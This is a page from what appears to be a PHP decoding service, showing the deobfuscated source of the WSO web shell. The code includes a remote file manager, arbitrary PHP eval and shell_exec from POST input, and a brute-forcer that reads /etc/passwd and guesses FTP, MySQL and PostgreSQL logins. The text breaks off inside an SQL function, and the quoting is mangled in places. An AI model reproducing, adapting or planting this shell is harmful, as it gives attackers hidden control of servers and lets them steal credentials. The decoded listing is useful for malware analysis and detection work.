Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: if (..
Decoded Output download
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("safe_mode");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) {
call_user_func("action" . $_POST["a"]);
}
goto Zxful;
GFRHq:
@ini_set("error_log", NULL);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("ZipArchive")) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
echo "Can't upload file!";
}
break;
case "mkdir":
if (!@mkdir($_POST["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "/" ? $path : $path . "/";
goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "..") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "paste":
goto aIzMf;
aIzMf:
if ($_COOKIE["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . "/", $f, $d . $s . "/");
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]);
}
} elseif ($_COOKIE["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . "/", $f, $d . $s . "/");
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
@rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f);
}
} elseif ($_COOKIE["act"] == "zip") {
if (class_exists("ZipArchive")) {
$zip = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["c"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["f"] as $f) {
if ($f == "..") {
continue;
}
if (@is_file($_COOKIE["c"] . $f)) {
$zip->addFile($_COOKIE["c"] . $f, $f);
} elseif (@is_dir($_COOKIE["c"] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/"));
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["cwd"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (class_exists("ZipArchive")) {
$zip = new ZipArchive();
foreach ($_COOKIE["f"] as $f) {
if ($zip->open($_COOKIE["c"] . $f)) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["cwd"]);
goto bK26y;
zHKjB:
wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"]));
goto QmWa1;
BU3zr:
$_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]);
goto zHKjB;
nrwbR:
chdir($_COOKIE["c"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("f", '', time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["f"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["p1"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("c", @$_POST["c"]);
goto Unr9o;
TYMaj:
WSOsetcookie("act", $_POST["p1"]);
goto XUMLY;
XUMLY:
WSOsetcookie("f", serialize(@$_POST["f"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "wsoCmp");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["sort"] = $sort;
goto RjKbq;
b42P7:
echo "</select> ";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]);
goto DufhY;
EoM5y:
if (!empty($_POST["p1"])) {
if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) {
$sort = array($match[1], (int)$match[2]);
}
}
goto uaEIV;
ecDrl:
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; goto QsnjB; J7jRR: if (!empty($_COOKIE["f"])) {
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
} goto uO4Od; zqQv8: foreach ($files as $f) {
echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools', null, '" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title = '{$f["link"]}'") . " ><b > [" . htmlspecialchars($f["name"]) . " ]</b > ") . "</a ></td ><td > " . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td ><td > " . $f["modify"] . "</td ><td > " . $f["owner"] . "/" . $f["group"] . "</td ><td ><a href =# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "<script>\xd
function sa() {
for (i = 0; i < d . files . elements . length; i++)
\x9 if (d . files . elements[i] . type == 'checkbox') \xd\xa \x9 d . files . elements[i] . checked = d . files . elements[0] . checked;\xd\xa }\xd\xa </script >
<table width = '100%' class='main' cellspacing = '0' cellpadding = '2' > \xd
<form name = files method = post ><tr ><th width = '13px' ><input type = checkbox onclick = 'sa()' class=chkbx ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")' > Name</a ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")' > Size</a ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")' > Modify</a ></th ><th > Owner / Group</th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")' > Permissions</a ></th ><th > Actions</th ></tr > "; goto lC5LC; b9q_L: echo "<tr ><td colspan = 7 > \xd\xa <input type = hidden name = a value = 'FilesMan' > \xd\xa\x9<input type = hidden name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' >
\xa <input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' > \xd\xa <select name = 'p1' ><option value = 'copy' > Copy</option ><option value = 'move' > Move</option ><option value = 'delete' > Delete</option > "; goto la8rp; MMpaa: $sort = array("name", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo " < option value = 'tar' > Compress(tar . gz)</option > "; goto qCBL1; zga6H: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type = text name = p2 value = 'wso_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "' > "; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "<input type='submit' value=' >> '></td></tr></form></table></div>"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "wsoCmp"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } goto ehyTX; gIv2Z: echo "</div>"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } goto OeBNf; FcH_v: if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } goto XQqyZ; tJhrh: if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } goto UpcWr; hJxBN: echo "<h1>File tools</h1><div class=content>"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "<br><br>"; goto kfx86; vLiGd: echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "</pre>"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "<pre class=ml1>"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; goto XU2TQ; MtAXT: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script > document . mf . p3 . value = "";</script > "; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo " </textarea ><input type = submit value = ">>" ></form > "; goto Pjp_6; l2f3k: echo "<form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;" ><textarea name = text class=bigarea > "; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script > p3_ = "";</script > "; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die(" < script>g(null, null, "" . urlencode($_POST["p3"]) . "", null, "") </script > "); } } goto S0xqX; S0xqX: echo "<form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;" ><input type = text name = name value = "" . htmlspecialchars($_POST["p1"]) . "" ><input type = submit value = ">>" ></form > "; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo " < script>p3_ = "";</script ><form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;" ><input type = text name = touch value = "" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . "" ><input type = submit value = ">>" ></form > "; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content - Type: " . $type); } else { header("Content - Type: application / octet - stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content - Disposition: attachment; filename = " . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo " < span>Name:</span > " . htmlspecialchars(@basename($_POST["p1"])) . " <span > Size:</span > " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " < span>Permission:</span > " . wsoPermsColor($_POST["p1"]) . " <span > Owner / Group:</span > " . $uid["name"] . "/" . $gid["name"] . "<br > "; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : " - "); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = " - "; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : " - "; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : " - "; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : " - "); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : " - "; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : " - "; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : " - "; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : " - "); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : " - "; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document . getElementById('PhpOutput') . style . display = '';document . getElementById('PhpOutput') . innerHTML = '" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo " </pre ></div > "; goto ujMFQ; Sz7n2: echo "<h1 > Execution PHP - code </h1 ><div class=content ><form name = pf method = post onsubmit = "if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;" ><textarea name = code class=bigarea id = PhpCode > " . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea ><input type = submit value = eval style = "margin-top:5px" > "; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo " < h1>PHP info </h1 ><div class=content ><style >.p {
color:#000;}</style>"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; goto LBJl4; VERJt: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "</div><br>"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo "</div>"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql</option></select></td>
\xa < td><input type = text name = sql_host value = "" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . "" ></td > \xd
